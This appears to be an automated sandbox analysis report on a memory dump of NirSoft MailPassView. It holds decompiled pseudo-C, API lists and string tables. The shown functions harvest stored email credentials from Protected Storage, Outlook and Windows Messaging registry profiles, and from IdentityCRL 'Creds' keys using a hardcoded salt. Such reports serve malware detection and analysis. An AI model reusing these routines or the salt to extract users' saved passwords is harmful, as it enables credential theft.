                                                                                0x0040b9fb
                                                                                0x0040b9ff
                                                                                0x0040ba0c
                                                                                0x0040ba13
                                                                                0x0040ba24
                                                                                0x0040ba29
                                                                                0x0040ba2b
                                                                                0x0040ba41
                                                                                0x0040ba52
                                                                                0x0040ba57
                                                                                0x0040ba59
                                                                                0x0040ba7c
                                                                                0x0040ba86
                                                                                0x0040ba8c
                                                                                0x0040ba96
                                                                                0x0040bab7
                                                                                0x0040babb
                                                                                0x0040bb09
                                                                                0x0040bb0a
                                                                                0x0040bb14
                                                                                0x0040bb19
                                                                                0x0040bb21
                                                                                0x0040bb27
                                                                                0x0040bb23
                                                                                0x0040bb23
                                                                                0x0040bb23
                                                                                0x0040bb30
                                                                                0x0040bb3d
                                                                                0x0040bb51
                                                                                0x0040bb5c
                                                                                0x0040bb6f
                                                                                0x0040bb71
                                                                                0x0040bb73
                                                                                0x0040bbe3
                                                                                0x0040bbe3
                                                                                0x00000000
                                                                                0x0040bb75
                                                                                0x0040bb7b
                                                                                0x0040bb8e
                                                                                0x0040bb94
                                                                                0x0040bb96
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040bb98
                                                                                0x0040bb9d
                                                                                0x0040bb9f
                                                                                0x0040bbad
                                                                                0x0040bbb9
                                                                                0x0040bbbb
                                                                                0x0040bbbd
                                                                                0x0040bbc4
                                                                                0x0040bbcf
                                                                                0x0040bbcf
                                                                                0x00000000
                                                                                0x0040bbbd
                                                                                0x0040bba7
                                                                                0x0040bba9
                                                                                0x0040bbab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040bbd5
                                                                                0x0040bbdd
                                                                                0x0040bbdf
                                                                                0x0040bbdf
                                                                                0x00000000
                                                                                0x0040bb7b
                                                                                0x0040bb73
                                                                                0x0040bac1
                                                                                0x0040bac6
                                                                                0x0040bac8
                                                                                0x0040bb07
                                                                                0x0040bb07
                                                                                0x00000000
                                                                                0x0040bb07
                                                                                0x0040baca
                                                                                0x0040bad1
                                                                                0x0040bad9
                                                                                0x0040bade
                                                                                0x0040bae7
                                                                                0x0040baf4
                                                                                0x0040bafa
                                                                                0x0040bafa
                                                                                0x00000000
                                                                                0x0040bae7
                                                                                0x0040baa5
                                                                                0x00000000
                                                                                0x0040baa5
                                                                                0x0040ba65
                                                                                0x00000000
                                                                                0x0040ba2d
                                                                                0x0040ba2d
                                                                                0x0040ba37
                                                                                0x0040bbe9
                                                                                0x0040bbe9
                                                                                0x0040bbf0
                                                                                0x0040bbf8
                                                                                0x0040bbfd
                                                                                0x0040bc05
                                                                                0x0040bc0e
                                                                                0x0040bc14
                                                                                0x0040bc14
                                                                                0x0040bc1b
                                                                                0x0040bc1f
                                                                                0x0040bc27
                                                                                0x0040bc30
                                                                                0x0040bc39
                                                                                0x0040bc3e
                                                                                0x0040bc3e
                                                                                0x00000000
                                                                                0x0040bc3e
                                                                                0x0040b9cd
                                                                                0x0040b9cd
                                                                                0x0040bc40
                                                                                0x0040bc46
                                                                                0x0040bc46

                                                                                APIs
                                                                                  • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                                  • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                  • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                                  • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                                • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                                • API String ID: 745651260-414181363
                                                                                • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                                • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403C3D, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170librarystringloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t38;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				char* _t73;
				void* _t76;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t89;
				signed int _t98;
				char* _t106;
				_Unknown_base(*)()* _t120;
				void* _t131;

				_t131 = __fp0;
				_t91 = __ecx;
				_push(__ecx);
				_t98 = __ecx;
				_t89 = __ecx + 0x87c;
				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
				E0040E894(_t89);
				_t38 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t89 + 8) = _t38;
				if(_t38 == 0) {
					L4:
					E0040E894(_t89);
				} else {
					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
					_t120 = _t86;
					_t91 = 0 | _t120 != 0x00000000;
					 *(_t89 + 0x10) = _t86;
					if(_t120 != 0) {
						goto L4;
					} else {
						_t91 = _t89 + 4;
						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
						_t122 = _t87;
						if(_t87 != 0) {
							goto L4;
						} else {
							 *(_t89 + 0xc) = 1;
						}
					}
				}
				E004047A0(_t98 + 0x890, _t122);
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
				_push(_t98 + 0x858); // executed
				E0040754D(_t91, _t122); // executed
				E0040719C(_t91, _t98 + 0x86c); // executed
				E0040765B(_t122, _t98 + 0x878); // executed
				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t123 = _t52;
				if(_t52 == 0) {
					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
				}
				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t124 = _t54;
				if(_t54 == 0) {
					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
				}
				E00402C44(_t91, _t131, _t98); // executed
				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
				_t56 = E00406278();
				_push( &_v8);
				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t58 = E0040EB3F();
				_t126 = _t58;
				if(_t58 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t126, _t131, _t98);
				}
				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t127 = _t60;
				if(_t60 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t127, _t131, _t98);
				}
				E0040E8AB(_t89);
				E004047F1(_t98 + 0x890);
				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
				E0040329E(_t131, _t98);
				E004034CB(_t91, _t127, _t131, _t98); // executed
				E0040396C(_t127, _t131, _t98); // executed
				E004037B1(_t91, _t98, _t131, _t98); // executed
				_t73 = _t98 + 0xb20;
				_t128 =  *_t73;
				if( *_t73 != 0) {
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
				}
				_t106 = _t98 + 0xc25;
				_t129 =  *_t106;
				if( *_t106 != 0) {
					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
				}
				_push(_t98 + 0x640); // executed
				E0040D9F9(_t129); // executed
				E0040D865(_t98 + 0x640);
				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
				return _t76;
			}





















                                                                                0x00403c3d
                                                                                0x00403c3d
                                                                                0x00403c40
                                                                                0x00403c44
                                                                                0x00403c46
                                                                                0x00403c4c
                                                                                0x00403c52
                                                                                0x00403c5c
                                                                                0x00403c66
                                                                                0x00403c69
                                                                                0x00403c9b
                                                                                0x00403c9d
                                                                                0x00403c6b
                                                                                0x00403c71
                                                                                0x00403c79
                                                                                0x00403c7b
                                                                                0x00403c7e
                                                                                0x00403c83
                                                                                0x00000000
                                                                                0x00403c85
                                                                                0x00403c88
                                                                                0x00403c8c
                                                                                0x00403c8e
                                                                                0x00403c90
                                                                                0x00000000
                                                                                0x00403c92
                                                                                0x00403c92
                                                                                0x00403c92
                                                                                0x00403c90
                                                                                0x00403c83
                                                                                0x00403ca8
                                                                                0x00403cb2
                                                                                0x00403cbc
                                                                                0x00403cc6
                                                                                0x00403cd0
                                                                                0x00403cdb
                                                                                0x00403cdc
                                                                                0x00403ce8
                                                                                0x00403cf4
                                                                                0x00403d07
                                                                                0x00403d0f
                                                                                0x00403d11
                                                                                0x00403d19
                                                                                0x00403d19
                                                                                0x00403d2c
                                                                                0x00403d34
                                                                                0x00403d36
                                                                                0x00403d3e
                                                                                0x00403d3e
                                                                                0x00403d44
                                                                                0x00403d49
                                                                                0x00403d53
                                                                                0x00403d5f
                                                                                0x00403d60
                                                                                0x00403d69
                                                                                0x00403d62
                                                                                0x00403d62
                                                                                0x00403d62
                                                                                0x00403d6e
                                                                                0x00403d73
                                                                                0x00403d7b
                                                                                0x00403d7d
                                                                                0x00403d8a
                                                                                0x00403d7f
                                                                                0x00403d83
                                                                                0x00403d83
                                                                                0x00403d9f
                                                                                0x00403da9
                                                                                0x00403db1
                                                                                0x00403db3
                                                                                0x00403dc0
                                                                                0x00403db5
                                                                                0x00403db9
                                                                                0x00403db9
                                                                                0x00403dc9
                                                                                0x00403dd4
                                                                                0x00403de0
                                                                                0x00403dec
                                                                                0x00403df2
                                                                                0x00403df8
                                                                                0x00403dfe
                                                                                0x00403e04
                                                                                0x00403e09
                                                                                0x00403e0f
                                                                                0x00403e12
                                                                                0x00403e1d
                                                                                0x00403e27
                                                                                0x00403e27
                                                                                0x00403e2c
                                                                                0x00403e32
                                                                                0x00403e35
                                                                                0x00403e45
                                                                                0x00403e55
                                                                                0x00403e5f
                                                                                0x00403e5f
                                                                                0x00403e6a
                                                                                0x00403e6b
                                                                                0x00403e71
                                                                                0x00403e7d
                                                                                0x00403e86

                                                                                APIs
                                                                                  • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                                • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                                Strings
                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                                • PStoreCreateInstance, xrefs: 00403C6B
                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                                • pstorec.dll, xrefs: 00403C57
                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                • API String ID: 2884822230-961845771
                                                                                • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                                • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D9F9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E004118A0(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047A0(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}











                                                                                0x0040da04
                                                                                0x0040da2a
                                                                                0x0040da2e
                                                                                0x0040db30
                                                                                0x0040db36
                                                                                0x0040db36
                                                                                0x0040da44
                                                                                0x0040da48
                                                                                0x0040db26
                                                                                0x0040db2a
                                                                                0x00000000
                                                                                0x0040db2a
                                                                                0x0040da67
                                                                                0x0040da6f
                                                                                0x0040da75
                                                                                0x0040da77
                                                                                0x0040da80
                                                                                0x0040da8c
                                                                                0x0040da96
                                                                                0x0040daa0
                                                                                0x0040daa4
                                                                                0x0040dab4
                                                                                0x0040dabb
                                                                                0x0040dabf
                                                                                0x0040daca
                                                                                0x0040dad4
                                                                                0x0040dadd
                                                                                0x0040daf2
                                                                                0x0040db0d
                                                                                0x0040db0d
                                                                                0x0040db16
                                                                                0x0040db16
                                                                                0x0040daca
                                                                                0x0040da8c
                                                                                0x0040db20
                                                                                0x00000000

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • memcpy.MSVCRT ref: 0040DADD
                                                                                • memcpy.MSVCRT ref: 0040DAF2
                                                                                  • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                  • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                                  • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                  • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                • API String ID: 2768085393-1693574875
                                                                                • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                                • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411654, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4123e0);
				E00411840(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x417b6c =  *0x417b6c | 0xffffffff;
				 *0x417b70 =  *0x417b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x416b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x416b88; // 0x0
				 *_t36 = _t63;
				 *0x417b68 =  *_adjust_fdiv;
				_t39 = E00401A4D();
				_t79 =  *0x416000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00401A4D);
					_pop(_t63);
				}
				E0041182C(_t39);
				_push(0x4123b0);
				_push(0x4123ac);
				L00411826();
				_t41 =  *0x416b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
				_push(0x4123a8);
				_push(0x412394); // executed
				L00411826(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00411879(_t70);
			}





















                                                                                0x00411654
                                                                                0x00411656
                                                                                0x0041165b
                                                                                0x00411669
                                                                                0x00411670
                                                                                0x00411691
                                                                                0x00411691
                                                                                0x00411672
                                                                                0x00411675
                                                                                0x0041167d
                                                                                0x00000000
                                                                                0x0041167f
                                                                                0x0041167f
                                                                                0x00411688
                                                                                0x004116a9
                                                                                0x004116ad
                                                                                0x00000000
                                                                                0x004116af
                                                                                0x004116af
                                                                                0x004116b1
                                                                                0x00000000
                                                                                0x004116b1
                                                                                0x0041168a
                                                                                0x0041168f
                                                                                0x00411696
                                                                                0x0041169d
                                                                                0x00000000
                                                                                0x0041169f
                                                                                0x0041169f
                                                                                0x004116a1
                                                                                0x004116b7
                                                                                0x004116b7
                                                                                0x004116b7
                                                                                0x004116ba
                                                                                0x004116ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041168f
                                                                                0x00411688
                                                                                0x0041167d
                                                                                0x004116bd
                                                                                0x004116c2
                                                                                0x004116c9
                                                                                0x004116d0
                                                                                0x004116d7
                                                                                0x004116dd
                                                                                0x004116e3
                                                                                0x004116e5
                                                                                0x004116eb
                                                                                0x004116f1
                                                                                0x004116fa
                                                                                0x004116ff
                                                                                0x00411704
                                                                                0x0041170a
                                                                                0x00411711
                                                                                0x00411717
                                                                                0x00411717
                                                                                0x00411718
                                                                                0x0041171d
                                                                                0x00411722
                                                                                0x00411727
                                                                                0x0041172c
                                                                                0x00411731
                                                                                0x00411750
                                                                                0x00411753
                                                                                0x00411758
                                                                                0x0041175d
                                                                                0x0041176a
                                                                                0x0041176c
                                                                                0x00411772
                                                                                0x004117ae
                                                                                0x004117ae
                                                                                0x004117b1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004117b3
                                                                                0x004117b4
                                                                                0x004117b4
                                                                                0x00411774
                                                                                0x00411774
                                                                                0x00411774
                                                                                0x00411775
                                                                                0x00411778
                                                                                0x0041177a
                                                                                0x00411785
                                                                                0x00411787
                                                                                0x00411787
                                                                                0x00411788
                                                                                0x00411788
                                                                                0x00411785
                                                                                0x0041178b
                                                                                0x0041178b
                                                                                0x0041178f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00411795
                                                                                0x0041179c
                                                                                0x004117a2
                                                                                0x004117a6
                                                                                0x004117bb
                                                                                0x004117a8
                                                                                0x004117a8
                                                                                0x004117a8
                                                                                0x004117c3
                                                                                0x004117c8
                                                                                0x004117ca
                                                                                0x004117d0
                                                                                0x004117d3
                                                                                0x004117d3
                                                                                0x004117d9
                                                                                0x0041180e
                                                                                0x00411819

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                • String ID:
                                                                                • API String ID: 3662548030-0
                                                                                • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                                • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410D1B, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E00410D1B(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040EE59( &_v796, _t64); // executed
				E00406734( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E00410C43(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040EE59(_t61, _t66);
				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
				E00410C43(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104); // executed
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L004115B2();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}





















                                                                                0x00410d1b
                                                                                0x00410d37
                                                                                0x00410d3c
                                                                                0x00410d49
                                                                                0x00410d4a
                                                                                0x00410d4e
                                                                                0x00410d55
                                                                                0x00410d5f
                                                                                0x00410d64
                                                                                0x00410d6d
                                                                                0x00410d72
                                                                                0x00410d7b
                                                                                0x00410d7c
                                                                                0x00410d86
                                                                                0x00410d92
                                                                                0x00410da2
                                                                                0x00410daa
                                                                                0x00410dbd
                                                                                0x00410dc5
